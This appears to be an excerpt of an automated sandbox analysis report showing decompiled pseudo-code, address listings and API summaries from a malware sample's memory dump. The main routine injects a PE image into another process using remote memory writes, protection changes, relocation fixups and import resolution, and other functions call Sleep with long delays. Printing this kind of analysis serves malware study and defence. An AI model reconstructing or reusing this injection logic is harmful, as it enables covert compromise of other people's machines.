														__eflags = _t391;
														if(_t391 != 0) {
															_v24 = E0039DF30(_t404,  *((intOrPtr*)(_t391 + 0x1c)));
															_v40 = E0039DF30(_t404,  *((intOrPtr*)(_t391 + 0x20)));
															_v48 = E0039DF30(_t404,  *((intOrPtr*)(_t391 + 0x24)));
															__eflags =  *(_t391 + 0x14);
															_v20 =  *((intOrPtr*)(_v8 + 0x7c)) + _t288;
															_v16 = 0;
															if( *(_t391 + 0x14) > 0) {
																do {
																	_t222 = _v24;
																	_t290 =  *_t222;
																	_v24 =  &(_t222[1]);
																	__eflags = _t290;
																	if(_t290 != 0) {
																		__eflags = _t290 - _v32;
																		if(_t290 < _v32) {
																			L58:
																			_t322 =  *(_v28 + 0x18);
																			_t226 = 0;
																			__eflags = _t322;
																			if(_t322 != 0) {
																				_t371 = _v16;
																				while(1) {
																					_t394 = _v48;
																					__eflags = ( *(_t394 + _t226 * 2) & 0x0000ffff) - _t371;
																					if(( *(_t394 + _t226 * 2) & 0x0000ffff) == _t371) {
																						break;
																					}
																					_t226 = _t226 + 1;
																					__eflags = _t226 - _t322;
																					if(_t226 < _t322) {
																						continue;
																					} else {
																					}
																					goto L71;
																				}
																				_t396 = E0039DF30(_t404,  *((intOrPtr*)(_v40 + _t226 * 4)));
																				E00396CB0( &_v152, 0x8b);
																				_t230 =  *0x3b8628; // 0x593938
																				_t405 = _t405 + 8;
																				_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x4c))))(_t396,  &_v152);
																				__eflags = _t231;
																				if(_t231 != 0) {
																					E00396CB0( &_v152, 0x8c);
																					_t374 =  *0x3b8628; // 0x593938
																					_t405 = _t405 + 8;
																					_t235 =  *((intOrPtr*)( *((intOrPtr*)(_t374 + 0x4c))))(_t396,  &_v152);
																					__eflags = _t235;
																					if(_t235 != 0) {
																						E00396CB0( &_v152, 0x8d);
																						_t327 =  *0x3b8628; // 0x593938
																						_t405 = _t405 + 8;
																						_t238 =  *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x4c))))(_t396,  &_v152);
																						__eflags = _t238;
																						if(_t238 != 0) {
																							E00396CB0( &_v152, 0x8e);
																							_t240 =  *0x3b8628; // 0x593938
																							_t405 = _t405 + 8;
																							_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t240 + 0x4c))))(_t396,  &_v152);
																							__eflags = _t241;
																							if(_t241 == 0) {
																								_t291 = _t290 + _v12;
																								__eflags = _t291;
																								 *(_t404 + 0xa4) = _t291;
																							}
																						} else {
																							 *(_t404 + 0xa0) = _t290 + _v12;
																						}
																					} else {
																						 *(_t404 + 0x9c) = _t290 + _v12;
																					}
																				} else {
																					 *(_t404 + 0x98) = _t290 + _v12;
																				}
																			}
																		} else {
																			__eflags = _t290 - _v20;
																			if(_t290 >= _v20) {
																				goto L58;
																			}
																		}
																	}
																	L71:
																	_t320 = _v28;
																	_t225 = _v16 + 1;
																	_v16 = _t225;
																	__eflags = _t225 -  *((intOrPtr*)(_t320 + 0x14));
																} while (_t225 <  *((intOrPtr*)(_t320 + 0x14)));
															}
															__eflags =  *(_t404 + 0x98);
															if( *(_t404 + 0x98) != 0) {
																__eflags =  *(_t404 + 0x9c);
																if( *(_t404 + 0x9c) != 0) {
																	__eflags =  *(_t404 + 0xa0);
																	if( *(_t404 + 0xa0) != 0) {
																		__eflags =  *(_t404 + 0xa4);
																		if( *(_t404 + 0xa4) != 0) {
																			_t203 = _v8;
																			_t289 = 0;
																			__eflags = 0 -  *((intOrPtr*)(_t203 + 6));
																			if(0 >=  *((intOrPtr*)(_t203 + 6))) {
																				L87:
																				 *((intOrPtr*)(_t404 + 0x58)) = _v12;
																				_t205 = E0039E6F0(_t404, _v12, 1, 0); // executed
																				__eflags = _t205;
																				if(_t205 != 0) {
																					 *(_t404 + 0x70) = 1;
																				}
																			} else {
																				_t393 = _v52 + 0x24;
																				__eflags = _t393;
																				while(1) {
																					_t206 =  *_t393;
																					__eflags = _t206 & 0x20000000;
																					if((_t206 & 0x20000000) == 0) {
																						__eflags = _t206 & 0x40000000;
																						if((_t206 & 0x40000000) == 0) {
																							asm("sbb eax, eax");
																							_t210 = ( ~(_t206 & 0x80000000) & 0x00000007) + 1;
																							__eflags = ( ~(_t206 & 0x80000000) & 0x00000007) + 1;
																						} else {
																							asm("sbb eax, eax");
																							_t210 = ( ~(_t206 & 0x80000000) & 0x00000002) + 2;
																						}
																					} else {
																						__eflags = _t206 & 0x40000000;
																						if((_t206 & 0x40000000) == 0) {
																							asm("sbb eax, eax");
																							_t210 = ( ~(_t206 & 0x80000000) & 0x00000070) + 0x10;
																						} else {
																							asm("sbb eax, eax");
																							_t210 = ( ~(_t206 & 0x80000000) & 0x00000020) + 0x20;
																						}
																					}
																					_t168 = _t393 - 0x1c; // 0xec81ec8b
																					_t169 = _t393 - 0x18; // 0x588
																					_t212 = E0039D9D0(_t404, _a4,  *_t169 + _v12,  *_t168, _t210); // executed
																					__eflags = _t212;
																					if(_t212 == 0) {
																						goto L89;
																					}
																					_t319 = _v8;
																					_t289 = _t289 + 1;
																					_t393 = _t393 + 0x28;
																					__eflags = _t289 - ( *(_t319 + 6) & 0x0000ffff);
																					if(_t289 < ( *(_t319 + 6) & 0x0000ffff)) {
																						continue;
																					} else {
																						goto L87;
																					}
																					goto L89;
																				}
																			}
																		}
																	}
																}
															}
														}
													} else {
														while(1) {
															L34:
															__eflags =  *_t390;
															if( *_t390 != 0) {
																goto L39;
															}
															L35:
															__eflags =  *(_t390 + 0x10);
															if( *(_t390 + 0x10) != 0) {
																goto L39;
															} else {
																__eflags =  *(_t390 + 8);
																if( *(_t390 + 8) != 0) {
																	goto L39;
																} else {
																	__eflags =  *(_t390 + 0xc);
																	if( *(_t390 + 0xc) != 0) {
																		goto L39;
																	} else {
																		__eflags =  *(_t390 + 4);
																		if( *(_t390 + 4) == 0) {
																			goto L53;
																		} else {
																			goto L39;
																		}
																	}
																}
															}
															goto L89;
															L39:
															_t242 =  *(_t390 + 0xc);
															_v16 = 0;
															__eflags = _t242;
															if(_t242 == 0) {
																L34:
																__eflags =  *_t390;
																if( *_t390 != 0) {
																	goto L39;
																}
															} else {
																L40:
																_t244 = E003917D0(_t287, _t404, _t390, _t404, __eflags, E0039DF30(_t404, _t242)); // executed
																_v28 = _t244;
																__eflags = _t244;
																if(_t244 != 0) {
																	_t397 = _v32;
																	_t245 =  *_t397;
																	__eflags = _t245;
																	if(_t245 == 0) {
																		_t245 =  *(_t397 + 0x10);
																	}
																	_t246 = E0039DF30(_t404, _t245);
																	_t287 =  *(_t397 + 0x10) + _v12;
																	_v24 = _t246;
																	_t247 =  *_t246;
																	__eflags = _t247;
																	if(_t247 == 0) {
																		L52:
																		_t390 = _t397 + 0x14;
																		_v32 = _t390;
																		do {
																			goto L34;
																		} while (_t242 == 0);
																		goto L40;
																	} else {
																		_t398 = _v28;
																		while(1) {
																			_t333 = _t404;
																			__eflags = _t247;
																			if(__eflags >= 0) {
																				_t248 = E0039DF30(_t333, _t247);
																				_t249 = _t248 + 2;
																				__eflags = _t248 + 2;
																				_t333 = _t404;
																			} else {
																				_t249 = _t247 & 0x0000ffff;
																			}
																			_t250 = E003965F0(_t333, _t404, __eflags, _t398, _t249); // executed
																			_v16 = _t250;
																			__eflags = _t250;
																			if(_t250 == 0) {
																				goto L89;
																			}
																			_t97 = _t404 + 0x5c; // 0x8b000000
																			_t252 = E00397B30(_t404,  *_t97, _t287,  &_v16, 4); // executed
																			__eflags = _t252;
																			if(_t252 != 0) {
																				_t254 = _v24 + 4;
																				_v24 = _t254;
																				_t247 =  *_t254;
																				_t287 = _t287 + 4;
																				__eflags = _t247;
																				if(_t247 != 0) {
																					continue;
																				} else {
																					_t397 = _v32;
																					goto L52;
																				}
																			}
																			goto L89;
																		}
																	}
																}
															}
															goto L89;
														}
													}
												} else {
													_t287 = E0039DF30(_t404,  *((intOrPtr*)(_v8 + 0xa0)));
													__eflags = _t287;
													if(_t287 != 0) {
														_t257 = 0;
														__eflags =  *_t287;
														if( *_t287 != 0) {
															do {
																_t339 =  *(_t287 + 4) - 8 >> 1;
																__eflags = _t339;
																_v24 = _t339;
																_t60 = _t287 + 8; // 0x8
																_v28 = _t257;
																_v44 = _t257;
																_v40 = _t257;
																_v20 = _t60;
																if(_t339 == 0) {
																	goto L31;
																} else {
																	goto L24;
																	L28:
																	_t263 = E00397B30(_t404);
																	__eflags = _t263;
																	if(_t263 != 0) {
																		L29:
																		_v20 =  &(_v20[0]);
																		_t79 =  &_v24;
																		 *_t79 = _v24 - 1;
																		__eflags =  *_t79;
																		if( *_t79 != 0) {
																			L24:
																			_t258 =  *_v20 & 0x0000ffff;
																			_t342 = _t258 >> 0xc;
																			__eflags = _t342 - 3;
																			if(_t342 != 3) {
																				goto L26;
																			} else {
																				_t399 = (_t258 & 0x00000fff) +  *_t287;
																				_t266 = E0039DF30(_t404, _t399);
																				_push(4);
																				_push( &_v28);
																				_v28 =  *_t266 + _v16;
																				_push(_t399 + _v12);
																				_push(_a4);
																				goto L28;
																			}
																		} else {
																			_t257 = 0;
																			__eflags = 0;
																			goto L31;
																		}
																	}
																	goto L89;
																	L26:
																	__eflags = _t342 - 0xa;
																	if(_t342 != 0xa) {
																		goto L29;
																	} else {
																		_t401 = (_t258 & 0x00000fff) +  *_t287;
																		_t261 = E0039DF30(_t404, _t401);
																		_push(8);
																		asm("adc edx, [eax+0x4]");
																		_t402 = _t401 + _v12;
																		__eflags = _t402;
																		_push( &_v44);
																		_v40 = 0;
																		_push(_t402);
																		_v44 = _v16 +  *_t261;
																		_push(_a4);
																		goto L28;
																	}
																}
																goto L89;
																L31:
																_t287 = _t287 +  *(_t287 + 4);
																__eflags =  *_t287 - _t257;
															} while ( *_t287 != _t257);
														}
														goto L32;
													}
												}
											} else {
												_t33 = _t194 + 0x10; // 0x28
												_t349 = _t33;
												_v20 = _t349;
												goto L13;
												L15:
												_t38 = _v20 - 4; // 0xffffa6cf
												_t273 =  *_t38 + _v12;
												_push(4);
												_push(0x1000);
												_push(_t287);
												_push(_t273);
												_push(_a4);
												E003A1E80(); // executed
												_t403 = _t273;
												__eflags = _t403;
												if(_t403 != 0) {
													_t275 = E003A1D90(_t287, _v36); // executed
													_v36 = _t275;
													memset(_t275, 0, _t287);
													_t405 = _t405 + 0x14;
													_t277 = E00397B30(_t404, _a4, _t403, _v36, _t287); // executed
													__eflags = _t277;
													if(_t277 != 0) {
														_t353 = _v20;
														_t278 =  *_t353;
														__eflags = _t278;
														if(_t278 == 0) {
															L19:
															_t384 = _v8;
															_v20 =  &(_v20[0xa]);
															_t280 = _v28 + 1;
															_v28 = _t280;
															__eflags = _t280 - ( *(_t384 + 6) & 0x0000ffff);
															if(_t280 < ( *(_t384 + 6) & 0x0000ffff)) {
																_t349 = _v20;
																L13:
																_t270 =  *(_t349 - 8);
																_t287 =  *_t349;
																__eflags = _t270 - _t287;
																if(_t270 > _t287) {
																	_t287 = _t270;
																}
																goto L15;
															} else {
																goto L20;
															}
														} else {
															_t46 =  &(_t353[1]); // 0xfe78858d
															_t47 = _t404 + 0x74; // 0xffff95d7
															_t283 = E00397B30(_t404, _a4, _t403,  *_t46 +  *_t47, _t278); // executed
															__eflags = _t283;
															if(_t283 != 0) {
																goto L19;
															}
														}
													}
												}
											}
										}
									}
									L89:
									_pop(_t286);
								}
							} else {
								_t284 = GetLastError();
								__eflags = _t284 - 0x1e7;
								if(_t284 == 0x1e7) {
									_t187 = _a4;
									_push(0x40);
									_push(0x2000);
									_push( *((intOrPtr*)(_t387 + 0x50)));
									_push(0);
									_push(_t187);
									E003A1E80();
									_v12 = _t187;
									__eflags = _t187;
									if(_t187 != 0) {
										goto L7;
									}
								}
							}
						}
					}
					__eflags =  *(_t404 + 0x70);
					if( *(_t404 + 0x70) == 0) {
						E00397920(_t286, _t404);
					}
					_t181 = _v36;
					__eflags = _t181;
					if(_t181 != 0) {
						E0039BB40(_t181);
					}
					_t179 = _t404 + 0x58; // 0x9b8d00
					return  *_t179;
				} else {
					return 0;
				}
			}





























































































    0x0039b3b0
    0x0039b3ba
    0x0039b3c0
    0x0039b3c7
    0x0039b3d2
    0x0039b3d2
    0x0039b3da
    0x0039b3dd
    0x0039b3e0
    0x0039b3e9
    0x0039b3eb
    0x0039b3f1
    0x0039b3f4
    0x0039b3fa
    0x0039b3fb
    0x0039b3fd
    0x0039b405
    0x0039b408
    0x0039b40d
    0x0039b40e
    0x0039b40f
    0x0039b412
    0x0039b417
    0x0039b41a
    0x0039b41c
    0x0039b454
    0x0039b45c
    0x0039b45e
    0x0039b464
    0x0039b469
    0x0039b46a
    0x0039b46b
    0x0039b46e
    0x0039b473
    0x0039b475
    0x0039b477
    0x0039b47d
    0x0039b47e
    0x0039b497
    0x0039b4a1
    0x0039b4ab
    0x0039b4b0
    0x0039b4b2
    0x0039b4c7
    0x0039b4cc
    0x0039b4ce
    0x0039b4d4
    0x0039b4da
    0x0039b4da
    0x0039b4e0
    0x0039b4e3
    0x0039b4ea
    0x0039b4ee
    0x0039b5a6
    0x0039b5a6
    0x0039b5aa
    0x0039b68f
    0x0039b68f
    0x0039b692
    0x0039b694
    0x0039b774
    0x0039b777
    0x0039b77d
    0x0039b785
    0x0039b787
    0x0039b78a
    0x0039b78c
    0x0039b7a3
    0x0039b7b1
    0x0039b7b9
    0x0039b7c4
    0x0039b7c8
    0x0039b7cb
    0x0039b7d2
    0x0039b7d8
    0x0039b7d8
    0x0039b7db
    0x0039b7e0
    0x0039b7e3
    0x0039b7e5
    0x0039b7eb
    0x0039b7ee
    0x0039b7f9
    0x0039b7fc
    0x0039b7ff
    0x0039b801
    0x0039b803
    0x0039b809
    0x0039b810
    0x0039b810
    0x0039b817
    0x0039b819
    0x00000000
    0x00000000
    0x0039b81b
    0x0039b81c
    0x0039b81e
    0x00000000
    0x00000000
    0x0039b820
    0x00000000
    0x0039b81e
    0x0039b83f
    0x0039b841
    0x0039b846
    0x0039b84e
    0x0039b859
    0x0039b85b
    0x0039b85d
    0x0039b879
    0x0039b87e
    0x0039b887
    0x0039b892
    0x0039b894
    0x0039b896
    0x0039b8af
    0x0039b8b4
    0x0039b8bd
    0x0039b8c8
    0x0039b8ca
    0x0039b8cc
    0x0039b8e5
    0x0039b8ea
    0x0039b8f2
    0x0039b8fd
    0x0039b8ff
    0x0039b901
    0x0039b903
    0x0039b903
    0x0039b906
    0x0039b906
    0x0039b8ce
    0x0039b8d1
    0x0039b8d1
    0x0039b898
    0x0039b89b
    0x0039b89b
    0x0039b85f
    0x0039b862
    0x0039b862
    0x0039b85d
    0x0039b7f0
    0x0039b7f0
    0x0039b7f3
    0x00000000
    0x00000000
    0x0039b7f3
    0x0039b7ee
    0x0039b90c
    0x0039b90f
    0x0039b912
    0x0039b913
    0x0039b916
    0x0039b916
    0x0039b7d8
    0x0039b91f
    0x0039b926
    0x0039b92c
    0x0039b933
    0x0039b939
    0x0039b940
    0x0039b946
    0x0039b94d
    0x0039b953
    0x0039b958
    0x0039b95a
    0x0039b95e
    0x0039b9f5
    0x0039b9ff
    0x0039ba02
    0x0039ba07
    0x0039ba09
    0x0039ba0b
    0x0039ba0b
    0x0039b964
    0x0039b967
    0x0039b967
    0x0039b970
    0x0039b970
    0x0039b972
    0x0039b977
    0x0039b9a2
    0x0039b9a7
    0x0039b9c1
    0x0039b9c6
    0x0039b9c6
    0x0039b9a9
    0x0039b9b0
    0x0039b9b5
    0x0039b9b5
    0x0039b979
    0x0039b979
    0x0039b97e
    0x0039b998
    0x0039b99d
    0x0039b980
    0x0039b987
    0x0039b98c
    0x0039b98c
    0x0039b97e
    0x0039b9c7
    0x0039b9ca
    0x0039b9d9
    0x0039b9de
    0x0039b9e0
    0x00000000
    0x00000000
    0x0039b9e2
    0x0039b9e9
    0x0039b9ea
    0x0039b9ed
    0x0039b9ef
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039b9ef
    0x0039b970
    0x0039b95e
    0x0039b94d
    0x0039b940
    0x0039b933
    0x0039b926
    0x00000000
    0x0039b6a0
    0x0039b6a0
    0x0039b6a0
    0x0039b6a3
    0x00000000
    0x00000000
    0x0039b6a5
    0x0039b6a5
    0x0039b6a9
    0x00000000
    0x0039b6ab
    0x0039b6ab
    0x0039b6af
    0x00000000
    0x0039b6b1
    0x0039b6b1
    0x0039b6b5
    0x00000000
    0x0039b6b7
    0x0039b6b7
    0x0039b6bb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039b6bb
    0x0039b6b5
    0x0039b6af
    0x00000000
    0x0039b6c1
    0x0039b6c1
    0x0039b6c4
    0x0039b6cb
    0x0039b6cd
    0x0039b6a0
    0x0039b6a0
    0x0039b6a3
    0x00000000
    0x00000000
    0x0039b6cf
    0x0039b6cf
    0x0039b6da
    0x0039b6df
    0x0039b6e2
    0x0039b6e4
    0x0039b6ea
    0x0039b6ed
    0x0039b6ef
    0x0039b6f1
    0x0039b6f3
    0x0039b6f3
    0x0039b6f9
    0x0039b701
    0x0039b704
    0x0039b707
    0x0039b709
    0x0039b70b
    0x0039b769
    0x0039b769
    0x0039b76c
    0x0039b6a0
    0x00000000
    0x00000000
    0x00000000
    0x0039b70d
    0x0039b70d
    0x0039b710
    0x0039b710
    0x0039b712
    0x0039b714
    0x0039b71e
    0x0039b723
    0x0039b723
    0x0039b726
    0x0039b716
    0x0039b716
    0x0039b716
    0x0039b72a
    0x0039b72f
    0x0039b732
    0x0039b734
    0x00000000
    0x00000000
    0x0039b73a
    0x0039b747
    0x0039b74c
    0x0039b74e
    0x0039b757
    0x0039b75a
    0x0039b75d
    0x0039b75f
    0x0039b762
    0x0039b764
    0x00000000
    0x0039b766
    0x0039b766
    0x00000000
    0x0039b766
    0x0039b764
    0x00000000
    0x0039b74e
    0x0039b710
    0x0039b70b
    0x0039b6e4
    0x00000000
    0x0039b6cd
    0x0039b6a0
    0x0039b5b0
    0x0039b5c1
    0x0039b5c3
    0x0039b5c5
    0x0039b5cb
    0x0039b5cd
    0x0039b5cf
    0x0039b5d5
    0x0039b5db
    0x0039b5db
    0x0039b5dd
    0x0039b5e0
    0x0039b5e3
    0x0039b5e6
    0x0039b5e9
    0x0039b5ec
    0x0039b5ef
    0x00000000
    0x0039b666
    0x00000000
    0x0039b666
    0x0039b668
    0x0039b66d
    0x0039b66f
    0x0039b675
    0x0039b675
    0x0039b679
    0x0039b679
    0x0039b679
    0x0039b67c
    0x0039b5f5
    0x0039b5f8
    0x0039b5fe
    0x0039b602
    0x0039b606
    0x00000000
    0x0039b608
    0x0039b611
    0x0039b614
    0x0039b621
    0x0039b626
    0x0039b627
    0x0039b62d
    0x0039b62e
    0x00000000
    0x0039b62e
    0x0039b682
    0x0039b682
    0x0039b682
    0x00000000
    0x0039b682
    0x0039b67c
    0x00000000
    0x0039b631
    0x0039b631
    0x0039b635
    0x00000000
    0x0039b637
    0x0039b640
    0x0039b643
    0x0039b64f
    0x0039b651
    0x0039b654
    0x0039b654
    0x0039b65a
    0x0039b65b
    0x0039b661
    0x0039b662
    0x0039b665
    0x00000000
    0x0039b665
    0x0039b635
    0x00000000
    0x0039b684
    0x0039b684
    0x0039b687
    0x0039b687
    0x0039b5d5
    0x00000000
    0x0039b5cf
    0x0039b5c5
    0x0039b4f4
    0x0039b4f4
    0x0039b4f4
    0x0039b4f7
    0x0039b4fa
    0x0039b50e
    0x0039b511
    0x0039b514
    0x0039b51a
    0x0039b51c
    0x0039b521
    0x0039b522
    0x0039b523
    0x0039b526
    0x0039b52b
    0x0039b52d
    0x0039b52f
    0x0039b53a
    0x0039b543
    0x0039b546
    0x0039b551
    0x0039b55a
    0x0039b55f
    0x0039b561
    0x0039b567
    0x0039b56a
    0x0039b56c
    0x0039b56e
    0x0039b58c
    0x0039b58c
    0x0039b596
    0x0039b59a
    0x0039b59b
    0x0039b59e
    0x0039b5a0
    0x0039b500
    0x0039b503
    0x0039b503
    0x0039b506
    0x0039b508
    0x0039b50a
    0x0039b50c
    0x0039b50c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039b570
    0x0039b571
    0x0039b574
    0x0039b57f
    0x0039b584
    0x0039b586
    0x00000000
    0x00000000
    0x0039b586
    0x0039b56e
    0x0039b561
    0x0039b52f
    0x0039b4ee
    0x0039b4ce
    0x0039ba12
    0x0039ba12
    0x0039ba12
    0x0039b41e
    0x0039b41e
    0x0039b424
    0x0039b429
    0x0039b42f
    0x0039b432
    0x0039b434
    0x0039b43e
    0x0039b43f
    0x0039b441
    0x0039b444
    0x0039b449
    0x0039b44c
    0x0039b44e
    0x00000000
    0x00000000
    0x0039b44e
    0x0039b429
    0x0039ba13
    0x0039b3f4
    0x0039ba14
    0x0039ba18
    0x0039ba1c
    0x0039ba1c
    0x0039ba21
    0x0039ba24
    0x0039ba26
    0x0039ba29
    0x0039ba2e
    0x0039ba31
    0x0039ba38
    0x0039b3c9
    0x0039b3cf
    0x0039b3cf

    APIs
    • GetLastError.KERNEL32(0039C9A1,?,?,00002000,00000040,0039FEDD,0039FE81), ref: 0039B41E
      • Part of subcall function 00397B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCFB,?,?,?,00000070,?,?,?), ref: 00397B5C
      • Part of subcall function 0039D9D0: VirtualProtectEx.KERNELBASE(0039FEDD,00000040,00002000,?,0039FE81,0039FE81,?,0039B4CC,0039C9A1,00000000,?,00000002,0039C9A1,00000000,C45D89F0,?), ref: 0039D9F8
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memset.MSVCRT ref: 0039B546
      • Part of subcall function 003917D0: GetProcAddress.KERNEL32(00000000,?,?,0039FE81,?), ref: 0039181C
      • Part of subcall function 003965F0: GetProcAddress.KERNEL32(00000000,?,?,00000000,0039C9A1), ref: 0039663A
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039D890, Relevance: 6.1, APIs: 4, Instructions: 98
    C-Code - Quality: 20%
    			E0039D890(void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v8;
				char _v12;
				char _v212;
				void* _t21;
				void* _t26;
				intOrPtr* _t31;
				intOrPtr _t41;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;

				_v8 = 0;
				_v12 = 0;
				_t42 = 1;
				E00399090(__eflags,  &_v212, 0xd);
				_push( &_v12);
				_push( &_v8);
				_push( &_v212);
				_push(5);
				_push(_a8); // executed
				_t21 = E00395A10(); // executed
				_t49 = _t48 + 0x1c;
				if(_t21 == 0) {
					L11:
					_t22 = _v8;
					if(_v8 != 0) {
						E0039BB40(_t22);
					}
					return _t42;
				}
				if(_v8 == 0 || _v12 == 0) {
					_t42 = 2;
					goto L11;
				} else {
					_push(0x14);
					L0039A47E();
					_t49 = _t49 + 4;
					if(_t21 == 0) {
						_t46 = 0;
						__eflags = 0;
					} else {
						_t46 = E0039B1C0(_t21);
					}
					_t41 = _v12;
					_t26 = E00399020(_t46, _a4, _v8, _t41); // executed
					if(_t26 != 0) {
						__imp___time64(0);
						_t43 =  *((intOrPtr*)(_t46 + 0x10));
						_t49 = _t49 + 4;
						__eflags = 0 - _t41;
						if(__eflags > 0) {
							L18:
							_t31 = _a12;
							_t44 =  *_t31;
							__eflags = _t44;
							if(_t44 != 0) {
								E00392DE0(_t44);
								_push(_t44);
								L00391CB0();
								_t49 = _t49 + 4;
							}
							 *_t31 = _t46;
							_t42 = 0;
							goto L10;
						}
						if(__eflags < 0) {
							L17:
							_t42 = 4;
							goto L8;
						}
						__eflags = _t43 - _t26;
						if(_t43 >= _t26) {
							goto L18;
						}
						goto L17;
					} else {
						_t14 = _t26 + 3; // 0x3
						_t42 = _t14;
						L8:
						if(_t46 != 0) {
							E00392DE0(_t46);
							_push(_t46);
							L00391CB0();
							_t49 = _t49 + 4;
						}
						L10:
						goto L11;
					}
				}
			}
















    0x0039d8a6
    0x0039d8a9
    0x0039d8ac
    0x0039d8af
    0x0039d8b7
    0x0039d8be
    0x0039d8c5
    0x0039d8c6
    0x0039d8c8
    0x0039d8c9
    0x0039d8ce
    0x0039d8d3
    0x0039d932
    0x0039d932
    0x0039d937
    0x0039d93a
    0x0039d93f
    0x0039d949
    0x0039d949
    0x0039d8d8
    0x0039d989
    0x00000000
    0x0039d8e7
    0x0039d8e8
    0x0039d8ea
    0x0039d8ef
    0x0039d8f4
    0x0039d901
    0x0039d901
    0x0039d8f6
    0x0039d8fd
    0x0039d8fd
    0x0039d903
    0x0039d911
    0x0039d918
    0x0039d94b
    0x0039d951
    0x0039d956
    0x0039d959
    0x0039d95b
    0x0039d96a
    0x0039d96a
    0x0039d96d
    0x0039d96f
    0x0039d971
    0x0039d975
    0x0039d97a
    0x0039d97b
    0x0039d980
    0x0039d980
    0x0039d983
    0x0039d985
    0x00000000
    0x0039d985
    0x0039d95d
    0x0039d963
    0x0039d963
    0x00000000
    0x0039d963
    0x0039d95f
    0x0039d961
    0x00000000
    0x00000000
    0x00000000
    0x0039d91a
    0x0039d91a
    0x0039d91a
    0x0039d91d
    0x0039d91f
    0x0039d923
    0x0039d928
    0x0039d929
    0x0039d92e
    0x0039d92e
    0x0039d931
    0x00000000
    0x0039d931
    0x0039d918

    APIs
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • ??2@YAPAXI@Z.MSVCRT ref: 0039D8EA
    • ??3@YAXPAX@Z.MSVCRT ref: 0039D929
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • _time64.MSVCRT ref: 0039D94B
    • ??3@YAXPAX@Z.MSVCRT ref: 0039D97B
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A1B80, Relevance: 6.1, APIs: 4, Instructions: 84
    APIs
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • ??2@YAPAXI@Z.MSVCRT ref: 003A1BAF
    • ??3@YAXPAX@Z.MSVCRT ref: 003A1BEE
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • _time64.MSVCRT ref: 003A1C10
    • ??3@YAXPAX@Z.MSVCRT ref: 003A1C3D
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003936E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 429
    C-Code - Quality: 77%
    			E003936E0(void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v40;
				short _v240;
				char _v764;
				char _v1288;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				signed int _t93;
				intOrPtr _t96;
				intOrPtr _t98;
				signed char _t99;
				signed int _t101;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t108;
				signed int _t117;
				void* _t119;
				signed int _t124;
				intOrPtr _t125;
				signed int _t126;
				intOrPtr _t127;
				signed int _t128;
				signed int _t130;
				signed char _t136;
				signed int _t145;
				signed int _t148;
